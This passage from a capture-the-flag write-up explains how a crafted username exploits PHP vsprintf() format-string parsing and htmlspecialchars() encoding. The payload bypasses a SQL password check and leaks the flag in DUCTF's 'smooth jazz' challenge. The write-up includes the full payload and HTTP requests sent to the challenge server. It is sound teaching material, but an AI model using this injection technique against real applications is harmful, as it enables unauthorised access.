Fatal error: Uncaught ValueError: The arguments array must contain
2 items, 1 given in /pwd/jazz-data-pipeline-full.php:9
Stack trace:
#0 /pwd/jazz-data-pipeline-full.php(9): vsprintf('SELECT * FROM u...', Array)
#1 /pwd/jazz-data-pipeline-full.php(16): my_vsprintf('SELECT * FROM u...', Array)
#2 /pwd/jazz-data-pipeline-full.php(45): mysql_fquery('SELECT * FROM u...', Array)
#3 {main}
  thrown in /pwd/jazz-data-pipeline-full.php on line 9

And so while (in theory) this username string is going to let us win upon the generation of the greeting message, we get an earlier blow-up due to vsprintf() being given more format string conversion specifications than can be provided by the values array:

vsprintf('SELECT * FROM users WHERE username = "admin🔥%1$c;-- %s" ' .
             'AND password = "%s"',
         ["34c66477519b949b09b45e131347c17b5822a30a"]);

And so it seemed to us that we would need to find a way to cook our %s so that:

  • It’s “hidden” at the time of this earlier username/password SQL query; and
  • Once htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE) gets done, the string is modified in a way to make the %s come to life

A final opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is the final opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you craft the %s in such a way that it’s “hidden” at the time of the username and password SQL query avoiding the blow-up, but so that it springs forth once the htmlspecialchars() is done?

Here are some hints. No spoiler tags this time, this part was tough.

  • What is unique about the options being given to htmlspecialchars()?
  • RTFM

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

The prestige

To be frank, the solution came to us amidst a lot of guessing and wrong ideas. We knew that we needed to have a %s that only becomes apparent once the HTML encoding gets done on our username. Given that, we threw a lot of things from the vsprintf() documentation at the problem, interspersed with things that would change during HTML encoding, until something stuck.

After a lot of (semi-educated) trial and error, what ended up working was:

admin\x80%1$c;-- %1$'>%s

But why?

Keep in mind we have two objectives.

The first is for the following to not blow up:

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username.'" ' .
                        'AND password = "%s"',
                    [$password]);

That is, after $username is smashed directly into the format string, the format string must not demand more than the single element that the values array contains.

It can be shown that the winning input satisfies this objective.

At first glance our username appears to contain a %s. This %s, given there is already a %s in the format string, should cause a blow-up. The thing is, the %s in our username isn’t actually a %s!

This is the key part:

%1$'>%s
└─ ? │
     └──── should cause a blow-up?

According to the grammar of format string conversion specifications, this is broken down in the following way:

[+] %1$'>%
%  - start of format string conversion specification
1$ - argnum    - take from the first item in the values array
'> - flags     - use the > character as a padding character
%  - specifier - literal '%'

[+] s
Trailing junk

This means that the trailing s is not actually part of the format string conversion specification!

At its most minimal, this cursed format string specification behaves in the following way:

php > print_r(vsprintf('%1$\'>% %s', ["Hello, world!"]));
% Hello, world!

See? It is emitted as a literal % character in the output string!
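The same holds for the exact form used in the payload, where the s follows the specification directly. A minimal sketch (the square brackets and the value are arbitrary choices of mine, only there to make the boundaries visible):

```php
<?php
// One value, yet no ValueError: "%1$'>%" prints a literal "%" and the
// "s" that follows is copied through as ordinary text.
$out = vsprintf('[%1$\'>%s]', ['only value']);
echo $out, PHP_EOL;
```

On the PHP build used for this writeup this prints [%s], and the value in the array is never interpolated at all.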

What is surprising to me is that the 1$ is still needed:

php > print_r(vsprintf('%\'>% %s', ["Hello, world!"]));

Warning: Uncaught ValueError: The arguments array must contain
2 items, 1 given in php shell code:1
Stack trace:
#0 php shell code(1): vsprintf('%'>% %s', Array)
#1 {main}
  thrown in php shell code on line 1

Without it, the attempt to print a literal % seems to still consume one of the items in the values array, leaving nothing for the trailing %s.

This doesn’t happen, however, if you omit the padding directive:

php > print_r(vsprintf('%% %s', ["Hello, world!"]));
% Hello, world!

This inconsistency just doesn’t make sense to me. Why does %'x% (where x is a padding character) eat something out of the values array when emitting plain old %, but %% doesn’t eat a value? We can make them equivalently hungry by considering %% vs. %n$'x% (where n is a number that is less than or equal to the length of the values array) but it feels to me like we shouldn’t have to.

Perhaps I’m completely misunderstanding the way in which %1$'>% is being parsed as a conversion specification 😅

Begin sidequest

This was bothering me, so I sent hashkitten a lazy ping to see if he could spot my error.

He said:

I looked at the PHP source code to construct this problem. And the formatting is handled by the php_formatted_print function. But in fact, a double percent is handled in two places:

Here is the first place. it is a shortcut for %% only and doesn’t increment the arg counter.

Here is the second place. This happens after consuming padding, etc. and it consumes an arg.

This is probably a bug in PHP, not sure though 🙂

And so I’m not crazy! But PHP might be.

End sidequest

Regardless, %1$'>%s %s is satisfactory to vsprintf() when given a values array of length 1, and that gets us past the blow-up.

Moving on, the second objective for our input is for it to cause the following to leak the flag:

$htmlsafe_username = htmlspecialchars($username,
                                      ENT_COMPAT | ENT_SUBSTITUTE);
$greeting = $username === "admin" 
    ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
    : "Hello $htmlsafe_username, the server time is %s";

$message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

That is, after $username is HTML encoded (and given ENT_COMPAT we note that single quotes will survive the encoding), the format string needs to contain sufficient format string conversion specifications to cause the second item in the values array to be interpolated into $message as a string.

It can be shown that our input also causes this to occur:

php > $cursed = '%1$\'>%s';

php > $cursed_encoded = htmlspecialchars($cursed,
                                         ENT_COMPAT | ENT_SUBSTITUTE);

php > print_r($cursed_encoded);
%1$'&gt;%s

php > print_r(vsprintf($cursed_encoded . ' %s',
                       ["Hello, world!", "DUCTF{a flag}"]));
0t;Hello, world! DUCTF{a flag}
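As an aside on the flags themselves, here is a small sketch of what each one contributes. ENT_QUOTES is not used by the challenge and appears only for contrast; the variable names are mine.

```php
<?php
$cursed = '%1$\'>%s';

// ENT_COMPAT: double quotes are encoded, single quotes are left alone.
$compat = htmlspecialchars($cursed, ENT_COMPAT | ENT_SUBSTITUTE);

// ENT_QUOTES (not what the challenge uses): single quotes are encoded too.
$quotes = htmlspecialchars($cursed, ENT_QUOTES | ENT_SUBSTITUTE);

// ENT_SUBSTITUTE: an invalid UTF-8 byte becomes U+FFFD instead of
// making htmlspecialchars() return an empty string.
$substituted = htmlspecialchars("admin\x80", ENT_COMPAT | ENT_SUBSTITUTE);

var_dump($compat, $quotes, bin2hex($substituted));
```

With ENT_COMPAT the single quote survives, so the '& pair is still there for vsprintf() to read as a padding flag. With ENT_QUOTES the quote would itself be rewritten to &#039; and the trick would need rethinking.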

The HTML encoding has transformed our cursed format string conversion specification as follows:

plain:   %1$'>%s
encoded: %1$'&gt;%s

It has effectively “widened” our > to become &gt;

This means that our input, when HTML-encoded, now contains two different format string conversion specifications!

[+] %1$'&g
%  - start of format string conversion specification
1$ - argnum    - take from the first item in the values array
'& - flags     - use the & character as a padding character
g  - specifier - general format

[+] t;
Plain old data

[+] %s
A humble %s format string conversion specification

The first conversion specification is uninteresting. It explicitly takes the first element from the values array and interpolates it using the “general format” (the & padding character has no visible effect, since no width is given). Because it names its argument explicitly, it does not advance the values cursor.

The second conversion specification is very interesting. It takes the element at the cursor, which is still the first element, interpolates it as a string, and increments the values cursor by one.

This means that when vsprintf() gets to the trailing %s that naturally comes within the larger format string template into which our encoded username is being smashed, it interpolates the next item from the array as a string. This is our flag! 🥳
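To make the cursor bookkeeping visible, here is a toy trace. It is only a sketch: SPEC is my own regex approximation of the %[argnum$][flags][width][.precision]specifier grammar, and trace_specs() is a hypothetical helper that applies the rules described above (plain %% reads nothing, an explicit argnum leaves the cursor alone, everything else takes the next value). It is not PHP's real parser.

```php
<?php
// Toy model only: approximates sprintf's conversion specification grammar.
const SPEC = '/%(?:(\d+)\$)?(?:[-+ 0]|\'.)*\d*(?:\.\d+)?[bcdeEfFgGhHosuxX%]/';

// Hypothetical helper: list each conversion specification together with
// the 1-based position in the values array that it reads.
function trace_specs(string $format): array
{
    preg_match_all(SPEC, $format, $matches, PREG_SET_ORDER);
    $cursor = 0;
    $trace = [];
    foreach ($matches as $m) {
        if ($m[0] === '%%') {
            $trace[] = [$m[0], null];           // shortcut: reads nothing
        } elseif (($m[1] ?? '') !== '') {
            $trace[] = [$m[0], (int) $m[1]];    // explicit argnum, cursor untouched
        } else {
            $trace[] = [$m[0], ++$cursor];      // implicit: take next, advance
        }
    }
    return $trace;
}

$cursed  = '%1$\'>%s';
$encoded = htmlspecialchars($cursed, ENT_COMPAT | ENT_SUBSTITUTE);

foreach ([$cursed, $encoded] as $part) {
    $format = "Hello $part, the server time is %s";
    echo $format, PHP_EOL;
    foreach (trace_specs($format) as [$spec, $arg]) {
        printf("  %-8s reads %s\n", $spec,
               $arg === null ? 'nothing' : "value #$arg");
    }
}
```

For the plain form the template's own %s reads value #1 (the date). For the encoded form an extra %s appears in front of it and takes value #1, which pushes the template's %s on to value #2 (the flag).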

Running this username through the harness looks promising:

# php ./jazz-data-pipeline-full.php $'admin\x80%1$c;-- %1$\'>%s' 668
username: admin🔥%1$c;-- %1$'>%s
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- %1$'>%s"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- %1$'>%s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- %1$'>%s"

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "admin🔥%1$c;-- %1$'>%s" AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥";-- %s"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥";-- %s"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] vsprintf()
format string: Hello admin�%1$c;-- %1$'&gt;%s, the server time is %s
values: ["2023-09-10 03:24:37","DUCTF{dummy}"]
result: Hello admin�;-- 2023t;2023-09-10 03:24:37, the server time is DUCTF{dummy}

Running it against our local copy of the challenge gives us our dummy flag:

POST / HTTP/1.1
[... SNIP ...]

username=admin%80%251$c;--+%251$'>%25s&password=668

HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
<p>Hello admin�ç;-- 2023t;2023-09-07 02:19:22,
the server time is DUCTF{dummy}</p>
[... SNIP ...]
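The %25 sequences in the request body above are just percent-encoded % characters, so that the format string survives form decoding intact. A minimal sketch of building an equivalent body, assuming the password 668 from the request above (the variable names are mine):

```php
<?php
// The username as raw bytes; \x80 is the invalid UTF-8 byte.
$username = "admin\x80%1\$c;-- %1\$'>%s";

// rawurlencode() percent-encodes everything except letters, digits and
// "-", "_", ".", "~", so each literal "%" becomes "%25".
$body = 'username=' . rawurlencode($username) . '&password=668';
echo $body, PHP_EOL;
```

This encodes more characters than the hand-written body does (for example the space becomes %20 rather than +), but both decode to the same username on the server.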

And running it against the challenge server gives us the real flag:

POST / HTTP/2
Host: web-smooth-jazz-3a2c947be0c6.2023.ductf.dev
[... SNIP ...]

username=admin%80%251$c;--+%251$'>%25s&password=668

HTTP/2 200 OK
[... SNIP ...]

[... SNIP ...]
<p>Hello admin�ç;-- 2023t;2023-09-07 02:21:54,
the server time is DUCTF{at_least_you_can_enjoy_the_jazz}</p>
[... SNIP ...]

🎉

EOF

If you’ve made it this far, thank you for reading. I hope you enjoyed the challenge and learned as much as we did while solving it!

What I love about hashkitten’s challenges is they are often multi-step. They involve threading multiple separate needles at once, and you need to be careful when threading subsequent ones to not unthread a prior one. This year’s DUCTF was another banger event, and I can’t recommend highly enough that you keep an eye out for next year’s.

Cheers!

Justin